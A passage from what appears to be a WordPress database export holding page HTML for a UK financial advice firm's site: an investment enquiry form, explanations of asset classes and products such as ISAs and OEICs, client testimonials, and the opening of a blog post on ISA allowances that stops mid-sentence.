iphorm_1_4-captcha-image-wrap\">&#13;\n            <div class=\"ifb-captcha-image-inner\">&#13;\n                &#13;\n            </div>&#13;\n        </div>&#13;\n&#13;\n        <script type=\"text/javascript\"><![CDATA[\r\n        <!--\r\n        jQuery(document).ready(function ($) {\r\n            $(\'#iphorm-captcha-image-iphorm_1_4_52fddc074edcc\').hover(function () {\r\n                $(this).stop().fadeTo(\'slow\', \'0.3\');\r\n            }, function () {\r\n                $(this).stop().fadeTo(\'slow\', \'1.0\');\r\n            }).click(function () {\r\n                var newSrc = $(this).attr(\'src\').replace(/&t=.+/, \'&t=\' + new Date().getTime());\r\n                $(this).attr(\'src\', newSrc);\r\n            });\r\n        });\r\n        //-->\r\n        ]]></script><div class=\"iphorm-errors-wrap iphorm-hidden\">&#13;\n    </div>    </div>&#13;\n</div><div class=\"iphorm-hidden\">&#13;\n    <label>This field should be left blank<input type=\"text\" name=\"iphorm_1_0\"/></label>&#13;\n</div>                <div class=\"iphorm-submit-wrap iphorm-submit-wrap-1 iphorm-clearfix\">&#13;\n                	<div class=\"iphorm-submit-input-wrap iphorm-submit-input-wrap-1\">&#13;\n                        <button class=\"iphorm-submit-element\" type=\"submit\" name=\"iphorm_submit\"><span><em>Send Enquiry</em></span></button>&#13;\n                    </div>&#13;\n                    <div class=\"iphorm-loading-wrap\"><span class=\"iphorm-loading\">Please wait...</span></div>&#13;\n                </div>&#13;\n            </div>&#13;\n                                            </div>&#13;\n            &#13;\n    <script type=\"text/javascript\"><![CDATA[\r\n	<!--\r\n	jQuery(\'#iphorm-outer-52fddc074edcc script\').remove();\r\n	//-->\r\n	]]></script></form></div></div>&#13;\n        <script type=\"text/javascript\"><![CDATA[// <![CDATA[\r\njQuery(document).ready(function ($) {     $(\'a[href=\"#standard\"]\').click(function () {         $(\'.iphorm-fancybox-link\').click();         return false;     }); });\r\n// ]]&gt;]]></script></div></div> <div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:15px;padding-bottom:0;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\">&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#tabs-1,#tabs-1.tabs-vertical .tabs,#tabs-1.tabs-vertical .tab_content{border-color:#ffffff !important;}\r\n	#main #tabs-1.tabs-horizontal,#tabs-1.tabs-vertical .tab_content,.pyre_tabs .tabs-container{background-color:#f4f4f4 !important;}\r\n	body #tabs-1.shortcode-tabs .tab-hold .tabs li,body.dark #sidebar .tab-hold .tabs li{border-right:1px solid #f4f4f4 !important;}\r\n	body #tabs-1.shortcode-tabs .tab-hold .tabs li:last-child{border-right-width:0 !important;}\r\n	body #tabs-1.shortcode-tabs .tab-hold .tabs li.no-border-right{border-right-width:0 !important;}\r\n	body #main #tabs-1 .tab-hold .tabs li a{background:#ffffff !important;border-bottom:0 !important;color:#303030 !important;}\r\n	body #main #tabs-1 .tab-hold .tabs li a:hover{background:#f4f4f4 !important;border-bottom:0 !important;}\r\n	body #main #tabs-1 .tab-hold .tabs li.active a,body #main #tabs-1 .tab-hold .tabs li.active{background:#f4f4f4 !important;border-bottom:0 !important;}\r\n	#sidebar .tab-hold .tabs li.active a{border-top-color:#afd9a5 !important;}\r\n	]]></style><div id=\"tabs-1\" class=\"tab-holder shortcode-tabs clearfix tabs-horizontal\"><div class=\"tab-hold tabs-wrapper\"><ul id=\"tabs\" class=\"tabset tabs\"><li><a href=\"#tab1\">What are the Asset Classes available?</a></li><li><a href=\"#tab2\">What Investment Products are available?</a></li></ul><div class=\"tab-box tabs-container\">&#13;\n<div id=\"tab1\" class=\"tab tab_content\">&#13;\n<p>Cash – Cash is generally considered to be the safest of the asset classes. Cash funds pay a rate of interest which can go up and down daily. Cash funds are often invested in bank deposits and are generally regarded as safe. However, the returns you receive might not be very attractive over the long term.</p>&#13;\n<p>UK Goverment bonds – These are sometimes called gilts or gilt edged securities, and are loans to the UK Government. The UK Government (as the issuer of the bond) agrees to pay a fixed rate of interest and to repay the loan at the end of a fixed term. UK Government Bonds are relatively secure since the interest rate is fixed. However, the actual price of the bond can go up and down.</p>&#13;\n<p>Corporate bonds – These are similar in structure to government bonds but they’re issued by companies. These are generally riskier than government bonds but carry the potential for higher returns. There are different categories of corporate bonds. Investment grade bonds are judged to be very likely to meet their payment obligations. Riskier high yield, or junk, bonds are not.</p>&#13;\n<p>Equities – Often referred to as stocks and shares, these are shares in companies. Shares are traded on stock markets and the share price can go up and down on a daily basis. Companies usually pay a dividend to share holders. Equities are generally considered to be the riskiest mainstream asset class. Overseas Equities provide some spread of risk but add currency risk.</p>&#13;\n</div>&#13;\n<div id=\"tab2\" class=\"tab tab_content\">&#13;\nIndividual Savings Accounts (ISAs) – Stocks and shares ISAs let you invest up to £10,200 a tax year. You don’t pay any personal tax on the growth in value of an ISA.&#13;\n<p>Investment trusts – These are companies which exist solely to invest in the shares of other companies. Shares in investment trust companies are traded on stock markets. Returns on these investments are normally subject to capital gains tax.</p>&#13;\n<p>OEICs (Open Ended Investment Companies) – These are a type of collective investment scheme and fund management companies usually run them. Your investment buys you shares in these schemes. The price of the shares can change daily, up or down, according to changes in the value of the assets they’re invested in. One advantage which OEICs have over investment trusts is that they can invest in different asset classes such as bonds and property. In this way they can spread the investment risk. Returns on these investments are normally subject to capital gains tax.</p>&#13;\n<p>Investment bonds – These are really life assurance plans with a large investment element. Like OEICs, they give you the opportunity to invest in a range of asset classes at the same time, spreading your investment risk. Returns on these bonds are normally paid net of basic rate income tax.</p>&#13;\n<p>Structured products – These are usually fixed term investment products which offer performance related to equity returns but aim to provide protection of the original amount invested as long as you keep your money invested for the full term. Returns on these investments are normally subject to capital gains tax.</p>&#13;\n</div>&#13;\n<p/></div></div></div>&#13;\n<div class=\"title\"><h2>Kind Words &amp; Praise</h2><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div> <div class=\"one_half\"> <style type=\"text/css\"><![CDATA[\r\n		#testimonials-1 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-1 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-1\" class=\"reviews clearfix\"/> <div class=\"review male\"><blockquote><q>“Very pleased with the service provided. Highly professional and standard of information provided was very comprehensive. I was kept informed at all stages of the process.”</q><div class=\"clearfix\"><span class=\"company-name\">Stephen McCoy</span></div></blockquote></div></div> <div class=\"one_half last\"><style type=\"text/css\"><![CDATA[\r\n		#testimonials-2 q{background-color:#f6f6f6 !important;color:#747474 !important;}\r\n		#testimonials-2 .review blockquote div:after{border-top-color:#f6f6f6 !important;}\r\n		]]></style><div id=\"testimonials-2\" class=\"reviews clearfix\"> <div class=\"review male\"><blockquote><q>“I found the staff who I personally dealt with very friendly helpful and professional and the people on the other side of the phone exceptionally friendly too.”</q><div class=\"clearfix\"><span class=\"company-name\">M Patterson</span></div></blockquote></div> </div> </div><div class=\"clearboth\"/>&#13;\n<p>We Compare All The Leading Investment Providers. Here are a Few You Might Recognise:</p>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/axa.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"\" target=\"\"><img src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div></div></div> <div class=\"fullwidth-box\" style=\"background-color:#ffffff;background-image:url();background-repeat:no-repeat;background-position:top left;background-attachment:scroll;border-top:0px solid ;border-bottom:0px solid ;padding-top:20px;padding-bottom:20px;-webkit-background-size: cover;-moz-background-size: cover;-o-background-size: cover;background-size: cover;\"><div class=\"avada-row\"><style type=\"text/css\"><![CDATA[#reading-box-container-3 .tagline-shadow:before,#reading-box-container-3 .tagline-shadow:after{opacity:0.7;}]]></style><div class=\"reading-box-container clearfix\" id=\"reading-box-container-3\"><section class=\"reading-box tagline-shadow\" style=\"background-color:#fafafa !important;border-width:0px;border-color:#f6f6f6!important;border-left-width:3px !important;border-left-color:#afd9a5!important;border-style:solid;\"><a href=\"#standard\" target=\"\" class=\"continue button large default\">Book Now</a><h2>It’s all so simple. To book a chat with our investment experts, click the link.</h2><p>It\'s free, and we think you\'ll like what you hear.</p><a href=\"#standard\" target=\"\" class=\"continue mobile-button button large default\">Book Now</a></section></div> </div></div>&#13;\n			</div>&#13;\n					</div>&#13;\n			</div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-3\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Latest Wealth Management News</p>		<ul><li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/seven-deadly-investment-sins/\">The Seven Deadly Investment Sins</a>&#13;\n							<span class=\"post-date\">February 10, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/mortgage-strategic-alliance/\">Mortgage Strategic Alliance</a>&#13;\n							<span class=\"post-date\">February 5, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/esmart-money-januaryfebruary-2014-issue/\">eSmart Money January/February 2017 issue</a>&#13;\n							<span class=\"post-date\">January 7, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/how-much-money-can-i-get-pension/\">How much Money can I get out of my Pension?</a>&#13;\n							<span class=\"post-date\">October 31, 2017</span>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"http://www.equalitywalk.org.uk/what-does-a-wealth-managerdo/\">What Does a Wealth Manager Do?</a>&#13;\n							<span class=\"post-date\">September 5, 2017</span>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>This year, 2017, sees us reach our 20 year anniversary. In all that time we’ve seen real changes in the financial market, but our core values have forever remained the same. Put simply, we’ve always striven to offer unbiased and objective financial advice, with a view to protecting and enhancing our client’s wealth and sense of well-being. Welcome to our company.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"recent_works-widget-3\" class=\"footer-widget-col recent_works\"><p>Useful Guides</p>		<div class=\"recent-works-items clearfix\">&#13;\n								<a href=\"http://www.equalitywalk.org.uk/portfolio-items/smart-money-nov-dec/\" title=\"Smart Money: Nov-Dec\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/11/cats-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cats\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/critical-illness-guide/\" title=\"Critical Illness Guide\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/cric-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"cric\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/guide-auto-enrolment/\" title=\"A Guide To Auto Enrolment\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/auto-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"auto\"/></a>&#13;\n						<a href=\"http://www.equalitywalk.org.uk/portfolio-items/investing-income/\" title=\"Investing For Income\">&#13;\n			<img width=\"66\" height=\"66\" src=\"http://www.equalitywalk.org.uk/wp-content/uploads/2013/10/investing-66x66.jpg\" class=\"attachment-recent-works-thumbnail wp-post-image\" alt=\"investing\"/></a>&#13;\n				</div>&#13;\n&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://www.equalitywalk.org.uk/feed/\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																					</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col last\"/></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\">&#13;\n					<ul class=\"copyright\"><li><br/><br/></li>&#13;\n			</ul></div>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	&#13;\n	&#13;\n	<!-- W3TC-include-js-head -->&#13;\n&#13;\n	&#13;\n<script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/main-min.js\"/></body>','Lump Sum Investment','Our lump sum investment advice is centred around your needs, and will ensure you avoid the common investment pitfalls that can prove to be very costly','publish','closed','closed','','lump-sum-investment','','','2017-09-21 16:34:34','2017-09-21 16:34:34','',0,'http://www.equalitywalk.org.uk/lump-sum-investment',0,'page','',0),(79,1,'2017-09-21 16:34:34','2017-09-21 16:34:34','<body class=\"single single-post postid-7771 single-format-standard light  wpb-js-composer js-comp-ver-4.1.2 vc_responsive\" data-spy=\"scroll\">&#13;\n&#13;\n&#13;\n&#13;\n&#13;\n	<div id=\"wrapper\">&#13;\n								<div class=\"header-wrapper\">&#13;\n			<div class=\"header-v3\">&#13;\n		&#13;\n		<header id=\"header\"><div class=\"avada-row\" style=\"margin-top:0px;margin-bottom:0px;\">&#13;\n			<div class=\"logo\" style=\"margin-right:0px;margin-top:15px;margin-left:0px;margin-bottom:15px;\">&#13;\n				<a href=\"/\">&#13;\n					&#13;\n									</a>&#13;\n			</div>&#13;\n						<nav id=\"nav\" class=\"nav-holder\"><ul class=\"navigation menu fusion-navbar-nav\"><li id=\"menu-item-7214\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7214 fusion-dropdown-menu\"><a href=\"../wealth-management/\">Wealth Management</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-44\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-44 fusion-dropdown-submenu\"><a href=\"../wealth-platform/\">Wealth Platform</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-27\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-27 fusion-megamenu-menu\"><a href=\"../pensions/\">Pensions</a>&#13;\n<div class=\"fusion-megamenu-wrapper columns-3 col-span-12 container\"><div class=\"row\">&#13;\n&#13;\n<ul class=\"fusion-megamenu-holder\"><ul class=\"fusion-megamenu \"><li id=\"menu-item-8353\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8353 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">Pensions&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-6154\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6154\"><a href=\"../pensions/pension-review/\"><span class=\"fusion-megamenu-bullet\"/>Pension Review</a></li>&#13;\n		<li id=\"menu-item-95\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-95\"><a href=\"../pensions/sipps/\"><span class=\"fusion-megamenu-bullet\"/>SIPPS</a></li>&#13;\n		<li id=\"menu-item-967\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-967\"><a href=\"../pensions/pension-release/\"><span class=\"fusion-megamenu-bullet\"/>Pension Release</a></li>&#13;\n		<li id=\"menu-item-741\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-741\"><a href=\"../pensions/pension-transfer/\"><span class=\"fusion-megamenu-bullet\"/>Pension Transfer</a></li>&#13;\n		<li id=\"menu-item-6848\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6848\"><a href=\"../tracking-down-your-lost-pension/\"><span class=\"fusion-megamenu-bullet\"/>Lost Pension</a></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-8579\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8579 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">At Retirement&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-139\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-139\"><a href=\"../pensions/income-drawdown/\"><span class=\"fusion-megamenu-bullet\"/>Income Drawdown</a></li>&#13;\n		<li id=\"menu-item-8599\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-8599\"><a href=\"../best-annuity-rates/\"><span class=\"fusion-megamenu-bullet\"/>Annuities</a></li>&#13;\n		<li id=\"menu-item-8580\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8580\"><div class=\"fusion-megamenu-widgets-container\"><div id=\"wooslider_slideshow_posts-2\" class=\"widget widget_wooslider_slideshow_posts\"><div id=\"wooslider-id-1\" class=\"wooslider wooslider-id-1 wooslider-type-posts wooslider-theme-default\"><ul class=\"slides\"><li class=\"slide\">&#13;\n<div class=\"layout-text-left overlay-none\"><a href=\"http://www.equalitywalk.org.uk/better-pension-drawdown-annuity/\"/><div class=\"slide-excerpt\"><h2 class=\"slide-title\"><a href=\"../better-pension-drawdown-annuity/\">Which is Better Pension Drawdown or Annuity?</a></h2></div></div></li>&#13;\n</ul></div>&#13;\n</div></div></li>&#13;\n	</ul></h3></li>&#13;\n	<li id=\"menu-item-6852\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-6852 fusion-megamenu-submenu fusion-megamenu-columns-3 col-lg-4 col-md-4 col-sm-4\"><h3 class=\"fusion-megamenu-title\">For Business&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-136\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-136\"><a href=\"../pensions/auto-enrolment-pensions/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Pensions</a></li>&#13;\n		<li id=\"menu-item-6494\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-6494\"><a href=\"../auto-enrolment-report/\"><span class=\"fusion-megamenu-bullet\"/>Auto Enrolment Report</a></li>&#13;\n		<li id=\"menu-item-133\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-133\"><a href=\"../pensions/group-pension-plan/\"><span class=\"fusion-megamenu-bullet\"/>Group Pension Plan</a></li>&#13;\n	</ul></h3></li>&#13;\n&#13;\n</ul></ul><div style=\"clear:both;\"/>&#13;\n</div>&#13;\n</div>&#13;\n</li>&#13;\n<li id=\"menu-item-8624\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8624 fusion-megamenu-menu\"><a>Other Services</a>&#13;\n&#13;\n</li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"../about-us/\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"../our-team/\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"../about-us/testimonials/\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"../terms-of-use/\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"../privacy-policy/\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"../cookies/\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a>Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-8734\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8734 fusion-dropdown-submenu\"><a href=\"../category/video-2/\">Watch Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8732\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8732\"><a href=\"../pension-reforms-offer-freedom-savers/\">Pension Reforms Offer Freedom to Savers</a></li>&#13;\n		<li id=\"menu-item-8771\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8771\"><a href=\"../staging-date-social-advisors/\">When is your Staging Date?</a></li>&#13;\n		<li id=\"menu-item-8781\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8781\"><a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a></li>&#13;\n		<li id=\"menu-item-8780\" class=\"menu-item menu-item-type-post_type menu-item-object-post menu-item-8780\"><a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a></li>&#13;\n	</ul></li>&#13;\n	<li id=\"menu-item-8733\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-8733 fusion-dropdown-submenu\"><a href=\"../our-blog/\">Read Our Blog</a>&#13;\n	<ul class=\"sub-menu\"><li id=\"menu-item-8587\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8587\"><a href=\"../category/annuities/\">Annuities</a></li>&#13;\n		<li id=\"menu-item-8588\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8588\"><a href=\"../category/insurance-protection/\">Insurance Protection</a></li>&#13;\n		<li id=\"menu-item-8589\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-8589\"><a href=\"../category\">Investments</a></li>&#13;\n		<li id=\"menu-item-8590\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8590\"><a href=\"../category/pensions/\">Pensions</a></li>&#13;\n		<li id=\"menu-item-8591\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8591\"><a href=\"../category/\">Trusts</a></li>&#13;\n		<li id=\"menu-item-8592\" class=\"menu-item menu-item-type-taxonomy menu-item-object-category menu-item-8592\"><a href=\"../category/wealth-management/\">Wealth Management</a></li>&#13;\n	</ul></li>&#13;\n</ul></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</header></div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n			<div class=\"page-title-container\">&#13;\n		<div class=\"page-title\">&#13;\n			<div class=\"page-title-wrapper\">&#13;\n				<div class=\"page-title-captions\">&#13;\n										<h1 class=\"entry-title\">&#13;\n										Make the Most of Your ISA Allowance – Before it’s Too Late										</h1>&#13;\n														</div>&#13;\n															<ul class=\"breadcrumbs\"><li> <a href=\"/\">Home</a></li><li><a href=\"../category\" title=\"Investments\">Investments</a></li><li>Make the Most of Your ISA Allowance – Before it’s Too Late</li></ul></div>&#13;\n		</div>&#13;\n	</div>&#13;\n																			<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n		<div id=\"content\" class=\"full-width\" style=\"width:100%\">&#13;\n										<div id=\"post-7771\" class=\"post-7771 post type-post status-publish format-standard has-post-thumbnail hentry category-investments post\">&#13;\n												<span class=\"entry-title\" style=\"display: none;\">Make the Most of Your ISA Allowance – Before it’s Too Late</span>&#13;\n						<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\"> &#13;\n	<div class=\"vc_span3 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			 &#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<h2><a href=\"#\"/></h2>&#13;\n<h2/>&#13;\n<h2>Fast Facts</h2>&#13;\n<p>#1 Use Your ISA Allowance<br/>&#13;\nmake sure you do that before any other savings or investments.</p>&#13;\n<p>#2 Time is Running Out<br/>&#13;\nIf you have unused allowances, then you’ve 23 days to use them otherwise they are irretrievably lost.</p>&#13;\n<p>#3 ISAs can be Transferred<br/><span style=\"line-height: 1.5em;\"> if you’re not happy with the return you’re receiving on your cash ISA it could well be improved by switching to a different provider.</span></p>&#13;\n<p>#4 Don’t Wait Until the 